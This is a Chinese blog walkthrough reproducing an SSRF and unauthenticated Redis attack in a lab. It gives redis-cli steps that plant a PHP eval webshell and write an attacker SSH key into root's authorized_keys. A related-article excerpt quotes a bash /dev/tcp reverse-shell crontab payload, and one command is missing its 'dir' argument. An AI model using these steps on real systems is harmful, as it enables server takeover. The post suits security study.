SSRF+redis未授权漏洞复现

最新推荐文章于 2024-02-03 23:11:23 发布
最新推荐文章于 2024-02-03 23:11:23 发布
阅读量638 收藏 1
点赞数 2
文章标签: 安全 web安全 redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57094995/article/details/133563684
版权

1.SSRF漏洞简介

SSRF(Server-Side Request Forgery)即服务器端请求伪造,是一种由攻击者构造攻击链传给服务器,服务器执行并发起请求造成安全问题的漏洞,一般用来在外网探测或攻击内网服务。当网站需要调用指定URL地址的资源,但是没有对这个URL做好过滤,就会导致可以访问任意地址。

2 Redis未授权漏洞

redis默认绑定0.0.0.0:6379端口,默认没有密码。如果咱们的运维大兄弟上线服务时不限制IP访问和配置密码,那么6379端口就会暴露在公网任人宰割。

如果我们在渗透测试时碰到ssrf+redis未授权就可以考虑以下几种方式:

3.通过redis上传webshell

1.因为配置有误的redis所有主机都可以登上,所以我们先登上再说

redis-cli -h 192.168.179.128

2. 登上之后,需要得到靶机网站的物理路径(方法:1.报错界面查找信息 2.dirsearch查找phpinfo信息等)。当然,我用的自己的靶机因此掐指一算就得出该位置

 CONFIG SET /usr/share/nginx/html

3.随后给咱们shell起个名,并编写恶意代码

CONFIG SET dbfilename redis.php   //起名

set webshell "<?php @eval($_POST['shell']);?>"    //编写一句话木马

4.save保存

5.这时我们用蚁剑进行连接,测试下中用不

秒!太妙了!好了打住,那咱们在瞅瞅第二种方法

4.公私钥匙上传进行免密登录

1.首先咱们需要现在靶机建立一个文件夹(默认存放公私钥的地方)

mkdir /root/.ssh

2. 随后咱们在攻击机生成密钥对

ssh-keygen -t rsa

 

 id_rsa为私钥,id_rsa.pub为公钥

3.随后将公钥文件写入文本文件中

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > 1.txt

4.连接靶机redis

redis-cli -h 靶机IP

config set dir /root/.ssh #设置redis备份的目录为/root/.ssh

 

 5.一般情况下系统会认定authorized_keys为公钥文件名,因此咱们给他起个这样的名字

config set dbfilename authorized_keys # 设置公钥文件名

6.save保存

ok,以上所有搞定之后,咱们的高光时刻即将到来!

通过以下命令测试能否免密登录

ssh -i id_rsa root@192.168.179.128

结果:

妙不可言~~~

清风伴华裳
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2779
Redis授权访问漏洞利用方式总结(含靶场搭建)
ssrf+redis授权靶场
actistsec的博客
10-25 2082
自己搭建不太合理的ssrf联动redis授权
组合拳SSRF+redis授权访问
求大佬师傅带
09-15 578
组合拳SSRF+redis授权访问
再探SSRF服务器请求伪造(weblogic cve ssrf redis授权
热门推荐
Love&Share
04-26 1万+
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用:https://vulhub.org/#/docs/run/ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Jav
SSRF+Redis授权访问获得Webshell
weixin_42998420的博客
10-22 5635
Weblogic 存在SSRF , 内网Redis 数据库存在授权访问(空口令) URL地址: http://101.198.180.144:7001/uddiexplorer/SearchPublicRegistries.jsp 由于此SSRF能够在页面上回显信息,所以可以直接遍历内部信息, 笔者通过不断尝试,发现目标站点6379端口(Redis默认端口为6379) 如下图: 利用SSRF漏...
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
通过 SSRF 操作 Redis 主从 RCE1
08-04
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
zimbra_poc:Zimbra XXE + SSRF + UPC Poc
03-16
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> ...参考资料
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
SSRF是否有DNSpooq的漏洞
05-05
SSRF(Server-Side Request Forgery)是一种网络安全漏洞,它允许攻击者利用服务器的网络权限发起请求。在SSRF攻击中,攻击者可以控制服务器去访问任何受限制的内部资源,比如读取内部网络服务、攻击内网其他系统...
见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
这种漏洞可能影响Web界面、内部服务如数据库服务器、缓存服务器(如MongoDB、Memcached、Redis)等。 2. **识别SSRF**:通过检查Web接口,比如存在对外部资源访问的接口(如图片、文件上传等),或者内部端口(如80...
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
讲述服务端请求伪造(Server Side Request Forgery,SSRF)攻防
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2349
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
ssrf与redis授权访问
最新发布
xzh的博客
02-03 1105
发现发现他是比如config有6个字符就用$6表示六个字符然后再换行 思路就是用编码来将其进行编码 在用gopher协议来执行 可以使用工具来解决这个繁琐的工作 可在github找到。然后这里因为没有服务器就在windows安装了个低版本的redis 来远程连接这个被攻击机授权redis。由于较高版本的redis自带保护模式 这里要将其设置为no 在redis的conf文件。这里连接一下上传过的webshell吧访问并成功执行phpinfo并用蚁剑成功连接。修改成功运行redis
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1103
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
利用Weblogic中间件存在的SSRF漏洞结合redis授权访问漏洞GetShell
wenqingshuo321的博客
10-11 773
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
SSRF+redis
08-24
SSRF redis是指通过Server-Side Request Forgery (SSRF)攻击技术利用redis授权访问漏洞的组合。SSRF漏洞可以让攻击者发送伪造的请求,使服务器在攻击者的控制下发送请求到内部网络或其他外部系统。而redis授权访问漏洞指的是redis数据库经任何身份验证就可以被访问和控制的漏洞。通过这两种漏洞的结合,攻击者可以利用SSRF漏洞请求含有授权访问漏洞redis,然后通过redis的数据备份功能将恶意代码写入服务器的定时文件中,最终实现反弹shell攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ssrf+redis](https://blog.csdn.net/qq_45213259/article/details/110352124)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [SSRF+Redis组合拳啊哒~](https://blog.csdn.net/qq_43665434/article/details/115408269)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值